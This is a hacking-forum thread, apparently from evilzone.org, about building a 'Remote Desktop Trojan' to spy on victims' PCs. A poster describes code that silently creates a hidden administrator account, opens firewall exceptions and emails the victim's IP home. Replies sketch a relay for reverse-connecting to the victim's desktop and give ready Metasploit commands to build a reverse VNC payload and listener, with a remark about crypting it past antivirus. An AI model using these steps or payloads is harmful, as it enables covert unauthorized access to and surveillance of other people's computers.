Remote Desktop Trojan

[Kulverstukas]

I don't know much about RDP. But keep in mind that a virus should have everything in itself. Additional batch or VBScript files are not how viruses roll.

[Infinityexists]

I don't know much about RDP. But keep in mind that a virus should have everything in itself. Additional batch or VBScript files are not how viruses roll.

Don't worry about that bro, its not gonna have any additional file , it will be fully compiled/encrypted into a single executable file.
the only problem i want to resolve right now if the connection is reverse how i'd be able to look into the victim's PC,
if it is possible i'll find out


I've already generated a simple VBscript code to add exception into Windows Firewall to allow RDP connection / FTP request , and if the exception is already blocked by the Victim then instead of adding a new exception it will override the already defined exception and set it status to 'Allow'

[Kulverstukas]

If you are enabling the windows default RDP then I guess you don't need to put exceptions in the Firewall. You don't even need to do anything else I think. Just enable the RDP with settings you want, then let the virus send the info back to you, like the IP, port, user and password - this might be tricky, maybe email?

[Infinityexists]

If you are enabling the windows default RDP then I guess you don't need to put exceptions in the Firewall. You don't even need to do anything else I think. Just enable the RDP with settings you want, then let the virus send the info back to you, like the IP, port, user and password - this might be tricky, maybe email?

Easy as pie it will be done

[ande]

Let me just start of by saying that I really do not know how to start this reply. This topic contains so much retarded text and information written in a manner that should never see they light of day.

The things discussed in this topic is basic networking knowledge. Not the RDC part, but the WAN/LAN/routing part.


To start of I will answer the original topic question;

How does Remote Desktop trojan work? Does it enable the port 3389(default) itself at the victims router configuration? If not, how does it work? Since if i want to code my own, it is only possible if the victim has enabled Router Port of 3389?

(quote above is not original, corrected quite a lot.)

<rant>
When you use commas, use them correctly. It is not "word , word" or "word,word" or "word ,word". It is "word, word".
One does not use capital letters in words that are not names, locations, abbreviations and a few other exceptions.
Use punctuations.
Use question marks.
Use line breaks.
DO NOT USE THE WORD "BRO" OR ALIKE.

This may not be as annoying to you and people writing like yourself right now. But once you stop writing like a fool and start writing understandable, it is a real mother-fucking-pain in the ass.
</rant>

Now on to your question:
Very very few applications/services auto forward their ports in routers and Microsoft's remote desktop control service is not one of them. This is simply because there are no standards for this(I am sure there are more reasons for it as well). All routers(most) are different from one another and so forth.
However, there are something called UPnP which allows for temporarily port forwarding. Various torrent clients and so forth use UPnP to allow file exchange. I suggest you look into that, or use reverse connection technology.

In reply to your this part of your question(", if no then how it works :S"): If you are in a LAN and separated from the Internet by a router or other means of network separation, you have to configure your separation device(s) to forward specific ports and or addresses to the correct machine inside the LAN and then connect to the routers public IP(often revered to as port forwarding).

I would suggest you look away from most other replies than mine in this topic as they are just confusing and or wrong. I would also suggest you do the first part of a CCNA Cisco certification or something along those lines. Not saying that you need to have a deep understanding of everything before moving on, but its a smart choice if you do.

I would also like to apologize for any offense people will take from this as I know people will. The 'rant' section of this reply is a general reply to all rubbish-writers. I do not mean to offend anyone, but I just can't stand people who can't write properly. Even though I have been there and done that.

[Infinityexists]

Let me just start of by saying that I really do not know how to start this reply. This topic contains so much retarded text and information written in a manner that should never see they light of day.

The things discussed in this topic is basic networking knowledge. Not the RDC part, but the WAN/LAN/routing part.


To start of I will answer the original topic question;
(quote above is not original, corrected quite a lot.)<rant>
When you use commas, use them correctly. It is not "word , word" or "word,word" or "word ,word". It is "word, word".
One does not use capital letters in words that are not names, locations, abbreviations and a few other exceptions.
Use punctuations.
Use question marks.
Use line breaks.
DO NOT USE THE WORD "BRO" OR ALIKE.

This may not be as annoying to you and people writing like yourself right now. But once you stop writing like a fool and start writing understandable, it is a real mother-fucking-pain in the ass.
</rant>

Now on to your question:
Very very few applications/services auto forward their ports in routers and Microsoft's remote desktop control service is not one of them. This is simply because there are no standards for this(I am sure there are more reasons for it as well). All routers(most) are different from one another and so forth.
However, there are something called UPnP which allows for temporarily port forwarding. Various torrent clients and so forth use UPnP to allow file exchange. I suggest you look into that, or use reverse connection technology.

In reply to your this part of your question(", if no then how it works :S"): If you are in a LAN and separated from the Internet by a router or other means of network separation, you have to configure your separation device(s) to forward specific ports and or addresses to the correct machine inside the LAN and then connect to the routers public IP(often revered to as port forwarding).

I would suggest you look away from most other replies than mine in this topic as they are just confusing and or wrong. I would also suggest you do the first part of a CCNA Cisco certification or something along those lines. Not saying that you need to have a deep understanding of everything before moving on, but its a smart choice if you do.

I would also like to apologize for any offense people will take from this as I know people will. The 'rant' section of this reply is a general reply to all rubbish-writers. I do not mean to offend anyone, but I just can't stand people who can't write properly. Even though I have been there and done that.

I want to use a Reverse Connection Technique to connect to the PC,
I've coded the complete program that when runs created a new hidden Administrator account with the password of my choice inside the victim computer and then email me the victim IP address and computer name but what to do after that i need any ideas of reverse connecting through Remote Desktop so even if I receive RD request from the victim he wouldn't even know what has happened and he won't be able to see my desktop rather I would be able to see his desktop or even if i can browse Victim PC.


The Remote Desktop connection could easily be executed in the background using mstsc  command with blah blah parameter.

[ande]

The concept of reverse connection does not mean that you reverse the action being performed. Only the connectivity establishment. I assume you are using the windows remote desktop control crap which means there are no inbuilt reverse connection and you are pretty much screwed.

You could however, though I think its a little bit out of your skill capacity still. Create a software solution to overcome this:
Instead of connecting to your victims IP, you connect to your localhost where there will be a program listening. This program at the same time listens to a remote port which a second program running on your victims computer are constantly trying to connect to. And once you connect to the local program on your machine, and there is a connection from your machine's program to the victim's program, a message will be sent by your program to the other program making the other program connect to localhost on your victims computer. Once all the above have been done, the programs will not do anything other than passing traffic along. Piping your remote desktop control client to your victim's remote desktop control server.

Client <-> Local program <- INTERNET -> Victim program <-> Server

[noob]

Why dont you try reverse VNC session with metasploit:


Create payload:
./msfpayload windows/vncinject/reverse_tcp LHOST=192.168.1.12 LPORT=2482 X > /tmp/reverse-vnc.exe

Listener:
./msfcli exploit/multi/handler PAYLOAD=windows/vncinject/reverse_tcp LHOST=192.168.1.12 LPORT=2482 DisableCourtesyShell=TRUE E

Ofcourse this will be detected by AV if you dont know how to crypt it.

[Infinityexists]

you connect to your localhost where there will be a program listening. This program at the same time listens to a remote port which a second program running on your victims computer are constantly trying to connect to. And once you connect to the local program on your machine, and there is a connection from your machine's program to the victim's program, a message will be sent by your program to the other program making the other program connect to localhost on your victims computer. Once all the above have been done, the programs will not do anything other than passing traffic along. Piping your remote desktop control client to your victim's remote desktop control server.


Client <-> Local program <- INTERNET -> Victim program <-> Server

The quoted part sounds really interesting, I understand a bit of it,


OK first , I connect to my localhost using xampp but what exactly does that mean 'there will be a program listening This program at the same time listens to a remote port which a second program running on your victims computer'


could you elaborate or give me any clue where i can read more about it ?
I actually need a proper example about this.

Why dont you try reverse VNC session with metasploit:




Create payload:
./msfpayload windows/vncinject/reverse_tcp LHOST=192.168.1.12 LPORT=2482 X > /tmp/reverse-vnc.exe


Listener:
./msfcli exploit/multi/handler PAYLOAD=windows/vncinject/reverse_tcp LHOST=192.168.1.12 LPORT=2482 DisableCourtesyShell=TRUE E


Ofcourse this will be detected by AV if you dont know how to crypt it.

payload, listener thing are way out of my knowledge
but i'd love to look into it if you can tell me more or link me to the basics

[noob]

http://evilzone.org/video-tutorials/%28community-edition%29-metasploit-framework-expert-certification-dvd/